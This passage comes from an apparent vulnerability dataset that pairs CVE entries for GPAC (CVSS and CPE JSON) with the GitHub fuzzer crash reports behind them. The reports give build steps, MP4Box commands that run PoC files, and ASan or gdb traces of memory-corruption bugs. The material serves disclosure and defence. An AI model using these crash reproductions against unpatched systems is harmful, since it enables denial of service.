gf_isom_box_array_read_ex isomedia/box_funcs.c:1419 #2 0x6c5114 in gf_isom_box_read isomedia/box_funcs.c:1528 #3 0x6c5114 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #4 0x6c5974 in gf_isom_parse_root_box isomedia/box_funcs.c:42 #5 0x6da6a0 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:206 #6 0x6dd2f3 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:194 #7 0x6dd2f3 in gf_isom_open_file isomedia/isom_intern.c:615 #8 0x42f88a in mp4boxMain /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_00dfc93/applications/mp4box/main.c:4767 #9 0x7ffff638082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #10 0x41e228 in _start (/home/aota09/yyp/fuzzcompare/test/gpac/test-crash/bin_asan/bin/MP4Box+0x41e228) 0x60400000df80 is located 0 bytes to the right of 48-byte region [0x60400000df50,0x60400000df80) allocated by thread T0 here: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0xaec17d in reftype_New isomedia/box_code_base.c:7521 SUMMARY: AddressSanitizer: heap-buffer-overflow isomedia/box_funcs.c:189 gf_isom_box_parse_ex Shadow bytes around the buggy address: 0x0c087fff9ba0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9bb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9bc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9bd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9be0: fa fa fa fa fa fa fa fa fa fa 00 00 00 00 00 00 =>0x0c087fff9bf0:[fa]fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 0x0c087fff9c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9c40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==25783==ABORTING ``` For POC-new-gf_isom_box_parse_ex-2 ```C ASAN info: ==25917==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60400000e000 at pc 0x0000006c4392 bp 0x7fffffff8090 sp 0x7fffffff8080 WRITE of size 4 at 0x60400000e000 thread T0 #0 0x6c4391 in gf_isom_box_parse_ex isomedia/box_funcs.c:189 #1 0x6c47bc in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419 #2 0x6c5114 in gf_isom_box_read isomedia/box_funcs.c:1528 #3 0x6c5114 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #4 0x6c5974 in gf_isom_parse_root_box isomedia/box_funcs.c:42 #5 0x6da6a0 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:206 #6 0x6dd2f3 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:194 #7 0x6dd2f3 in gf_isom_open_file isomedia/isom_intern.c:615 #8 0x42f88a in mp4boxMain /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_00dfc93/applications/mp4box/main.c:4767 #9 0x7ffff638082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #10 0x41e228 in _start (/home/aota09/yyp/fuzzcompare/test/gpac/test-crash/bin_asan/bin/MP4Box+0x41e228) 0x60400000e000 is located 0 bytes to the right of 48-byte region [0x60400000dfd0,0x60400000e000) allocated by thread T0 here: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0xaec17d in reftype_New isomedia/box_code_base.c:7521 SUMMARY: AddressSanitizer: heap-buffer-overflow isomedia/box_funcs.c:189 gf_isom_box_parse_ex Shadow bytes around the buggy address: 0x0c087fff9bb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9bc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9bd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9be0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9bf0: fa fa fa fa fa fa fa fa fa fa 00 00 00 00 00 00 =>0x0c087fff9c00:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9c40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9c50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==25917==ABORTING ``` --- Edit This bug issue still exists in latest version 0.8.0: 4c19ae5 and 0.9.0: 1de1f8d --- Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu([email protected]) 、Yanhao and Marsman1996([email protected])
ERROR: AddressSanitizer: heap-buffer-overflow in gf_isom_box_parse_ex isomedia/box_funcs.c:189
https://api.github.com/repos/gpac/gpac/issues/1327/comments
2
2019-11-09T11:12:14Z
2020-01-08T12:43:37Z
https://github.com/gpac/gpac/issues/1327
520,392,881
1,327
CVE-2019-20163
2019-12-31T00:15:12.587
An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is a NULL pointer dereference in the function gf_odf_avc_cfg_write_bs() in odf/descriptors.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1335" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00017.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:0.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "1EA85977-716F-48A1-8199-B8A7847AF223", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1335
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master 00dfc93) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ``` $ MP4Box -diso -out /dev/null $POC-new-gf_odf_avc_cfg_write_bs ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-00dfc93-crashes/POC-new-gf_odf_avc_cfg_write_bs gdb info: ```C Program received signal SIGSEGV, Segmentation fault. 0x000000000055aeee in gf_odf_avc_cfg_write_bs () (gdb) bt #0 0x000000000055aeee in gf_odf_avc_cfg_write_bs () #1 0x000000000055b1ff in gf_odf_avc_cfg_write () #2 0x00000000004f9ba1 in AVC_RewriteESDescriptorEx () #3 0x00000000006cf2a8 in video_sample_entry_Read () #4 0x0000000000512ce5 in gf_isom_box_parse_ex () #5 0x000000000051333b in gf_isom_box_array_read_ex () #6 0x0000000000512ce5 in gf_isom_box_parse_ex () #7 0x000000000051333b in gf_isom_box_array_read_ex () #8 0x00000000006d09d0 in stbl_Read () #9 0x0000000000512ce5 in gf_isom_box_parse_ex () #10 0x000000000051333b in gf_isom_box_array_read_ex () #11 0x00000000006ce02b in minf_Read () #12 0x0000000000512ce5 in gf_isom_box_parse_ex () #13 0x000000000051333b in gf_isom_box_array_read_ex () #14 0x00000000006cd2f0 in mdia_Read () #15 0x0000000000512ce5 in gf_isom_box_parse_ex () #16 0x000000000051333b in gf_isom_box_array_read_ex () #17 0x00000000006d351d in trak_Read () #18 0x0000000000512ce5 in gf_isom_box_parse_ex () #19 0x000000000051333b in gf_isom_box_array_read_ex () #20 0x00000000006ce545 in moov_Read () #21 0x00000000005137e1 in gf_isom_box_parse_ex.constprop () #22 0x0000000000513e15 in gf_isom_parse_root_box () #23 0x000000000051b4fe in gf_isom_parse_movie_boxes.part () #24 0x000000000051c48c in gf_isom_open_file () #25 0x000000000041c082 in mp4boxMain () #26 0x00007ffff72ed830 in __libc_start_main (main=0x40eb70 <main>, argc=5, argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe308) at ../csu/libc-start.c:291 #27 0x000000000040eba9 in _start () ``` ASAN info: ```C ASAN:SIGSEGV ================================================================= ==25871==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x000000797a2b bp 0x60200000ed98 sp 0x7fffffff7230 T0) #0 0x797a2a in gf_odf_avc_cfg_write_bs odf/descriptors.c:567 #1 0x79821e in gf_odf_avc_cfg_write odf/descriptors.c:631 #2 0x68b393 in AVC_RewriteESDescriptorEx isomedia/avc_ext.c:1063 #3 0xaddd66 in video_sample_entry_Read isomedia/box_code_base.c:4408 #4 0x6c3d6e in gf_isom_box_read isomedia/box_funcs.c:1528 #5 0x6c3d6e in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #6 0x6c47bc in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419 #7 0x6c3d6e in gf_isom_box_read isomedia/box_funcs.c:1528 #8 0x6c3d6e in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #9 0x6c47bc in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419 #10 0xae19df in stbl_Read isomedia/box_code_base.c:5381 #11 0x6c3d6e in gf_isom_box_read isomedia/box_funcs.c:1528 #12 0x6c3d6e in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #13 0x6c47bc in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419 #14 0xadb4fe in minf_Read isomedia/box_code_base.c:3500 #15 0x6c3d6e in gf_isom_box_read isomedia/box_funcs.c:1528 #16 0x6c3d6e in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #17 0x6c47bc in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419 #18 0xad96ef in mdia_Read isomedia/box_code_base.c:3021 #19 0x6c3d6e in gf_isom_box_read isomedia/box_funcs.c:1528 #20 0x6c3d6e in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #21 0x6c47bc in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419 #22 0xae8ad8 in trak_Read isomedia/box_code_base.c:7129 #23 0x6c3d6e in gf_isom_box_read isomedia/box_funcs.c:1528 #24 0x6c3d6e in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #25 0x6c47bc in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419 #26 0xadc064 in moov_Read isomedia/box_code_base.c:3745 #27 0x6c5114 in gf_isom_box_read isomedia/box_funcs.c:1528 #28 0x6c5114 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #29 0x6c5974 in gf_isom_parse_root_box isomedia/box_funcs.c:42 #30 0x6da6a0 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:206 #31 0x6dd2f3 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:194 #32 0x6dd2f3 in gf_isom_open_file isomedia/isom_intern.c:615 #33 0x42f88a in mp4boxMain /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_00dfc93/applications/mp4box/main.c:4767 #34 0x7ffff638082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #35 0x41e228 in _start (/home/aota09/yyp/fuzzcompare/test/gpac/test-crash/bin_asan/bin/MP4Box+0x41e228) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV odf/descriptors.c:567 gf_odf_avc_cfg_write_bs ==25871==ABORTING ``` --- Edit This bug issue still exists in latest version 0.8.0: 4c19ae5 and 0.9.0: 1de1f8d --- Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu([email protected]) 、Yanhao and Marsman1996([email protected])
AddressSanitizer: NULL pointer dereference in gf_odf_avc_cfg_write_bs odf/descriptors.c:567
https://api.github.com/repos/gpac/gpac/issues/1335/comments
2
2019-11-09T11:23:01Z
2020-01-08T12:45:23Z
https://github.com/gpac/gpac/issues/1335
520,395,160
1,335
CVE-2019-20164
2019-12-31T00:15:12.667
An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is a NULL pointer dereference in the function gf_isom_box_del() in isomedia/box_funcs.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1332" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:0.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "1EA85977-716F-48A1-8199-B8A7847AF223", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1332
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master 00dfc93) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ``` $ MP4Box -diso -out /dev/null $POC-new-gf_isom_box_del ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-00dfc93-crashes/POC-new-gf_isom_box_del gdb info: ```C Error in /bin/MP4Box: free(): invalid next size (fast): 0x00000000009cc5a0 ======= Backtrace: ========= /lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7ffff73447e5] /lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7ffff734d37a] /lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7ffff735153c] /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7ffff72ed830] ======= Memory map: ======== 009c8000-009ec000 rw-p 00000000 00:00 0 [heap] 7ffff0000000-7ffff0021000 rw-p 00000000 00:00 0 7ffff0021000-7ffff4000000 ---p 00000000 00:00 0 7ffff70b7000-7ffff70cd000 r-xp 00000000 08:02 67633677 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff70cd000-7ffff72cc000 ---p 00016000 08:02 67633677 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff72cc000-7ffff72cd000 rw-p 00015000 08:02 67633677 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff72cd000-7ffff748d000 r-xp 00000000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff748d000-7ffff768d000 ---p 001c0000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff768d000-7ffff7691000 r--p 001c0000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7691000-7ffff7693000 rw-p 001c4000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7693000-7ffff7697000 rw-p 00000000 00:00 0 7ffff7697000-7ffff76b0000 r-xp 00000000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff76b0000-7ffff78af000 ---p 00019000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff78af000-7ffff78b0000 r--p 00018000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff78b0000-7ffff78b1000 rw-p 00019000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff78b1000-7ffff79b9000 r-xp 00000000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff79b9000-7ffff7bb8000 ---p 00108000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff7bb8000-7ffff7bb9000 r--p 00107000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff7bb9000-7ffff7bba000 rw-p 00108000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff7bba000-7ffff7bd2000 r-xp 00000000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7bd2000-7ffff7dd1000 ---p 00018000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7dd1000-7ffff7dd2000 r--p 00017000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7dd2000-7ffff7dd3000 rw-p 00018000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7dd3000-7ffff7dd7000 rw-p 00000000 00:00 0 7ffff7dd7000-7ffff7dfd000 r-xp 00000000 08:02 67637528 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7fdf000-7ffff7fe4000 rw-p 00000000 00:00 0 7ffff7ff7000-7ffff7ff8000 rw-p 00000000 00:00 0 7ffff7ff8000-7ffff7ffa000 r--p 00000000 00:00 0 [vvar] 7ffff7ffa000-7ffff7ffc000 r-xp 00000000 00:00 0 [vdso] 7ffff7ffc000-7ffff7ffd000 r--p 00025000 08:02 67637528 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7ffd000-7ffff7ffe000 rw-p 00026000 08:02 67637528 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7ffe000-7ffff7fff000 rw-p 00000000 00:00 0 7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] Program received signal SIGABRT, Aborted. 0x00007ffff7302428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. (gdb) bt #0 0x00007ffff7302428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 #1 0x00007ffff730402a in __GI_abort () at abort.c:89 #2 0x00007ffff73447ea in __libc_message (do_abort=do_abort@entry=2, fmt=fmt@entry=0x7ffff745ded8 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175 #3 0x00007ffff734d37a in malloc_printerr (ar_ptr=<optimized out>, ptr=<optimized out>, str=0x7ffff745df50 "free(): invalid next size (fast)", action=3) at malloc.c:5006 #4 _int_free (av=<optimized out>, p=<optimized out>, have_lock=0) at malloc.c:3867 #5 0x00007ffff735153c in __GI___libc_free (mem=<optimized out>) at malloc.c:2968 #6 0x0000000000512a7d in gf_isom_box_del () #7 0x0000000000513810 in gf_isom_box_parse_ex.constprop () #8 0x0000000000513e15 in gf_isom_parse_root_box () #9 0x000000000051b4fe in gf_isom_parse_movie_boxes.part () #10 0x000000000051c48c in gf_isom_open_file () #11 0x000000000041c082 in mp4boxMain () #12 0x00007ffff72ed830 in __libc_start_main (main=0x40eb70 <main>, argc=5, argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe308) at ../csu/libc-start.c:291 #13 0x000000000040eba9 in _start () ``` ASAN info: ```C ASAN:SIGSEGV ================================================================= ==27733==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000006c3869 bp 0x60200000eff0 sp 0x7fffffff8560 T0) #0 0x6c3868 in gf_isom_box_del isomedia/box_funcs.c:1500 #1 0x6c3a06 in gf_isom_box_array_del isomedia/box_funcs.c:270 #2 0x6dce18 in gf_isom_delete_movie isomedia/isom_intern.c:657 #3 0x6dd32b in gf_isom_open_file isomedia/isom_intern.c:624 #4 0x42f88a in mp4boxMain /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_00dfc93/applications/mp4box/main.c:4767 #5 0x7ffff638082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #6 0x41e228 in _start (/home/aota09/yyp/fuzzcompare/test/gpac/test-crash/bin_asan/bin/MP4Box+0x41e228) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV isomedia/box_funcs.c:1500 gf_isom_box_del ==27733==ABORTING ``` --- Edit This bug issue still exists in latest version 0.8.0: 4c19ae5 and 0.9.0: 1de1f8d asan ``` [iso file] Movie fragment but no moov (yet) - possibly broken parsing! [isom] not enough bytes in box tenc: 0 left, reading 139 (file isomedia/box_code_drm.c, line 1001) [iso file] Read Box "tenc" (start 8) failed (Invalid IsoMedia File) - skipping ASAN:SIGSEGV ================================================================= ==7918==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000006c45d9 bp 0x60200000eff0 sp 0x7fffffff8530 T0) #0 0x6c45d8 in gf_isom_box_del isomedia/box_funcs.c:1501 #1 0x6c4776 in gf_isom_box_array_del isomedia/box_funcs.c:270 #2 0x6de7d8 in gf_isom_delete_movie isomedia/isom_intern.c:657 #3 0x6deceb in gf_isom_open_file isomedia/isom_intern.c:624 #4 0x42f93d in mp4boxMain /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_1de1f8d-0.9/applications/mp4box/main.c:4789 #5 0x7ffff638082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #6 0x41e278 in _start (/home/aota09/yyp/fuzzcompare/test/gpac/test-crash/bin_asan_1de1f8d-0.9/bin/MP4Box+0x41e278) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV isomedia/box_funcs.c:1501 gf_isom_box_del ``` --- Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu([email protected]) 、Yanhao and Marsman1996([email protected]) asan: ``` ==23293==ERROR: AddressSanitizer: heap-use-after-free on address 0x60600000eeb8 at pc 0x0000006d2f36 bp 0x7ffc000b4c30 sp 0x7ffc000b4c20 READ of size 8 at 0x60600000eeb8 thread T0 #0 0x6d2f35 in gf_isom_box_del isomedia/box_funcs.c:1501 #1 0x6d2e5e in gf_isom_box_array_del isomedia/box_funcs.c:270 #2 0x6d2e5e in gf_isom_box_del isomedia/box_funcs.c:1517 #3 0x6d2e5e in gf_isom_box_array_del isomedia/box_funcs.c:270 #4 0x6d2e5e in gf_isom_box_del isomedia/box_funcs.c:1517 #5 0x6d2e5e in gf_isom_box_array_del isomedia/box_funcs.c:270 #6 0x6d2e5e in gf_isom_box_del isomedia/box_funcs.c:1517 #7 0x6d2e5e in gf_isom_box_array_del isomedia/box_funcs.c:270 #8 0x6d2e5e in gf_isom_box_del isomedia/box_funcs.c:1517 #9 0x6d4300 in gf_isom_box_array_read_ex isomedia/box_funcs.c:1422 #10 0xb17c35 in moov_Read isomedia/box_code_base.c:3745 #11 0x6d4817 in gf_isom_box_read isomedia/box_funcs.c:1529 #12 0x6d4817 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #13 0x6d51c7 in gf_isom_parse_root_box isomedia/box_funcs.c:42 #14 0x6eb4fb in gf_isom_parse_movie_boxes isomedia/isom_intern.c:206 #15 0x6ee2a2 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:194 #16 0x6ee2a2 in gf_isom_open_file isomedia/isom_intern.c:615 #17 0x431899 in mp4boxMain /home/aota05/yyp/fuzzsequence/test/gpac_4c19ae5/SRC_asan/applications/mp4box/main.c:4789 #18 0x7f49dcbd882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #19 0x41f648 in _start (/home/aota05/yyp/fuzzsequence/test/gpac_4c19ae5/SRC_asan/build/bin/MP4Box+0x41f648) 0x60600000eeb8 is located 24 bytes inside of 56-byte region [0x60600000eea0,0x60600000eed8) freed by thread T0 here: #0 0x7f49dd75a2ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca) #1 0x6d2ea7 in gf_isom_box_del isomedia/box_funcs.c:1509 #2 0xb052ef in stbl_AddBox isomedia/box_code_base.c:5314 #3 0x6d3f11 in gf_isom_box_array_read_ex isomedia/box_funcs.c:1472 #4 0xb1d707 in stbl_Read isomedia/box_code_base.c:5381 #5 0x6d333e in gf_isom_box_read isomedia/box_funcs.c:1529 #6 0x6d333e in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #7 0x6d3e2a in gf_isom_box_array_read_ex isomedia/box_funcs.c:1420 #8 0xb1701a in minf_Read isomedia/box_code_base.c:3500 #9 0x6d333e in gf_isom_box_read isomedia/box_funcs.c:1529 #10 0x6d333e in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #11 0x6d3e2a in gf_isom_box_array_read_ex isomedia/box_funcs.c:1420 #12 0xb15187 in mdia_Read isomedia/box_code_base.c:3021 #13 0x6d333e in gf_isom_box_read isomedia/box_funcs.c:1529 #14 0x6d333e in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #15 0x6d3e2a in gf_isom_box_array_read_ex isomedia/box_funcs.c:1420 #16 0xb249cd in trak_Read isomedia/box_code_base.c:7134 #17 0x6d333e in gf_isom_box_read isomedia/box_funcs.c:1529 #18 0x6d333e in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #19 0x6d3e2a in gf_isom_box_array_read_ex isomedia/box_funcs.c:1420 #20 0xb17c35 in moov_Read isomedia/box_code_base.c:3745 #21 0x6d4817 in gf_isom_box_read isomedia/box_funcs.c:1529 #22 0x6d4817 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #23 0x6d51c7 in gf_isom_parse_root_box isomedia/box_funcs.c:42 #24 0x6eb4fb in gf_isom_parse_movie_boxes isomedia/isom_intern.c:206 #25 0x6ee2a2 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:194 #26 0x6ee2a2 in gf_isom_open_file 